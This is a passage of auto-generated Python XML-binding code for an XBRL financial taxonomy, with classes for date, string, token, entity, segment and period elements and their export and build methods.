        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='gDayItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='gDayItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gDayItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gDayItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='gDayItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class gDayItemType
class gMonthItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``gMonthItemType`` simple-content
    element: a text value plus optional ``id``/``contextRef`` attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = gMonthItemType.subclass or gMonthItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='gMonthItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='gMonthItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gMonthItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gMonthItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='gMonthItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class gMonthItemType
class normalizedStringItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``normalizedStringItemType``
    simple-content element: a text value plus optional ``id``/``contextRef``
    attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = normalizedStringItemType.subclass or normalizedStringItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='normalizedStringItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='normalizedStringItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='normalizedStringItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='normalizedStringItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='normalizedStringItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class normalizedStringItemType
class tokenItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``tokenItemType`` simple-content
    element. Unlike its siblings it is extensible: an ``xsi:type``
    attribute (``extensiontype_``) may name a derived type."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None, extensiontype_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
        self.extensiontype_ = extensiontype_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = tokenItemType.subclass or tokenItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def get_extensiontype_(self):
        return self.extensiontype_

    def set_extensiontype_(self, extensiontype_):
        self.extensiontype_ = extensiontype_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='tokenItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='tokenItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='tokenItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='tokenItemType'):
        """Write each attribute at most once, including ``xsi:type``."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            # Declare the xsi prefix inline so the attribute is well-formed.
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='tokenItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id``, ``contextRef`` and ``xsi:type`` attributes."""
        for attr_, target_ in (('id', 'id'), ('contextRef', 'contextRef'), ('xsi:type', 'extensiontype_')):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, target_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class tokenItemType
class languageItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``languageItemType`` simple-content
    element: a text value plus optional ``id``/``contextRef`` attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = languageItemType.subclass or languageItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='languageItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='languageItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='languageItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='languageItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='languageItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class languageItemType
class NameItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``NameItemType`` simple-content
    element: a text value plus optional ``id``/``contextRef`` attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = NameItemType.subclass or NameItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='NameItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='NameItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='NameItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='NameItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='NameItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class NameItemType
class NCNameItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``NCNameItemType`` simple-content
    element: a text value plus optional ``id``/``contextRef`` attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = NCNameItemType.subclass or NCNameItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='NCNameItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='NCNameItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='NCNameItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='NCNameItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='NCNameItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class NCNameItemType
class segment(GeneratedsSuper):
    """Generated binding for the XBRL ``segment`` element: a container
    holding an ordered list of arbitrary (xs:any) child objects in
    ``anytypeobjs_``."""
    subclass = None
    superclass = None

    def __init__(self, anytypeobjs_=None):
        self.original_tagname_ = None
        # Default is created per-instance to avoid a shared mutable default.
        if anytypeobjs_ is None:
            self.anytypeobjs_ = []
        else:
            self.anytypeobjs_ = anytypeobjs_

    def factory(*args_, **kwargs_):
        """Build an instance, honoring a registered subclass if any."""
        if segment.subclass:
            return segment.subclass(*args_, **kwargs_)
        else:
            return segment(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)

    def insert_anytypeobjs_(self, index, value):
        # BUGFIX: the generated code referenced the non-existent attribute
        # ``self._anytypeobjs_`` (AttributeError on first call) and assigned
        # by index instead of inserting.  Insert into the real list instead.
        self.anytypeobjs_.insert(index, value)

    def hasContent_(self):
        # Any contained object makes the element non-empty.
        if (
            self.anytypeobjs_
        ):
            return True
        else:
            return False

    def export(self, outfile, level, namespace_='finassist:', name_='segment', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element and its contained children to ``outfile``."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='segment')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='segment', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='segment'):
        # No attributes defined for this type.
        pass

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='segment', fromsubclass_=False, pretty_print=True):
        # Each contained any-type object serializes itself.
        for obj_ in self.anytypeobjs_:
            obj_.export(outfile, level, namespace_, pretty_print=pretty_print)

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        # No attributes defined for this type.
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Wrap each child node as a generic any-type object and collect it."""
        obj_ = self.gds_build_any(child_, 'segment')
        if obj_ is not None:
            self.add_anytypeobjs_(obj_)
# end class segment
class contextEntityType(GeneratedsSuper):
    """The type for the entity element, used to describe the reporting
    entity.  Note that the scheme attribute is required and cannot be
    empty.  Holds an ``identifier`` child and an optional ``segment``."""
    subclass = None
    superclass = None

    def __init__(self, identifier=None, segment=None):
        self.original_tagname_ = None
        self.identifier = identifier
        self.segment = segment

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = contextEntityType.subclass or contextEntityType
        return cls(*args_, **kwargs_)

    def get_identifier(self):
        return self.identifier

    def set_identifier(self, identifier):
        self.identifier = identifier

    def get_segment(self):
        return self.segment

    def set_segment(self, segment):
        self.segment = segment

    def hasContent_(self):
        # Either child present makes the element non-empty.
        return self.identifier is not None or self.segment is not None

    def export(self, outfile, level, namespace_='finassist:', name_='contextEntityType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
        """Serialize this element and its children to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='contextEntityType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='contextEntityType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='contextEntityType'):
        # No attributes defined for this type.
        pass

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='contextEntityType', fromsubclass_=False, pretty_print=True):
        if self.identifier is not None:
            self.identifier.export(outfile, level, namespace_, name_='identifier', pretty_print=pretty_print)
        if self.segment is not None:
            # The segment child is emitted in the xbrli namespace.
            self.segment.export(outfile, level, namespace_='xbrli:', name_='segment', pretty_print=pretty_print)

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        # No attributes defined for this type.
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'identifier':
            obj_ = identifierType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'identifier'
            self.identifier = obj_
        elif nodeName_ == 'segment':
            obj_ = segment.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'segment'
            self.segment = obj_
# end class contextEntityType
class contextPeriodType(GeneratedsSuper):
    """The type for the period element, used to describe the reporting date
    info."""
    subclass = None
    superclass = None
    def __init__(self, startDate=None, endDate=None, instant=None, forever=None):
        # original_tagname_ remembers the tag this instance was parsed
        # from so export() can reproduce it.
        self.original_tagname_ = None
        self.startDate = startDate
        self.validate_dateUnion(self.startDate)
        self.endDate = endDate
        self.validate_dateUnion(self.endDate)
        self.instant = instant
        self.validate_dateUnion(self.instant)
        self.forever = forever
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        cls = contextPeriodType.subclass or contextPeriodType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_startDate(self):
        return self.startDate
    def set_startDate(self, startDate):
        self.startDate = startDate
    def get_endDate(self):
        return self.endDate
    def set_endDate(self, endDate):
        self.endDate = endDate
    def get_instant(self):
        return self.instant
    def set_instant(self, instant):
        self.instant = instant
    def get_forever(self):
        return self.forever
    def set_forever(self, forever):
        self.forever = forever
    def validate_dateUnion(self, value):
        # Validate type dateUnion, a restriction on None.
        pass
    def hasContent_(self):
        # True when at least one child element would be serialized.
        return (
            self.startDate is not None or
            self.endDate is not None or
            self.instant is not None or
            self.forever is not None
        )
    def export(self, outfile, level, namespace_='finassist:', name_='contextPeriodType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='contextPeriodType')
        if not self.hasContent_():
            # No children: self-closing element.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='contextPeriodType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='contextPeriodType'):
        # No attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='contextPeriodType', fromsubclass_=False, pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        # The three date variants are plain string children; the element
        # tag matches the attribute name.
        for tag_ in ('startDate', 'endDate', 'instant'):
            value_ = getattr(self, tag_)
            if value_ is not None:
                showIndent(outfile, level, pretty_print)
                outfile.write('<%s%s>%s</%s%s>%s' % (
                    namespace_, tag_,
                    self.gds_format_string(quote_xml(value_).encode(ExternalEncoding), input_name=tag_),
                    namespace_, tag_, eol_))
        if self.forever is not None:
            self.forever.export(outfile, level, namespace_, name_='forever', pretty_print=pretty_print)
    def build(self, node):
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ in ('startDate', 'endDate', 'instant'):
            value_ = self.gds_validate_string(child_.text, node, nodeName_)
            setattr(self, nodeName_, value_)
            # validate type dateUnion
            self.validate_dateUnion(value_)
        elif nodeName_ == 'forever':
            obj_ = foreverType.factory()
            obj_.build(child_)
            self.forever = obj_
            obj_.original_tagname_ = 'forever'
# end class contextPeriodType
class contextScenarioType(GeneratedsSuper):
    """Used for the scenario under which fact have been reported."""
    subclass = None
    superclass = None
    def __init__(self, anytypeobjs_=None):
        # original_tagname_ remembers the tag this instance was parsed
        # from so export() can reproduce it.
        self.original_tagname_ = None
        if anytypeobjs_ is None:
            self.anytypeobjs_ = []
        else:
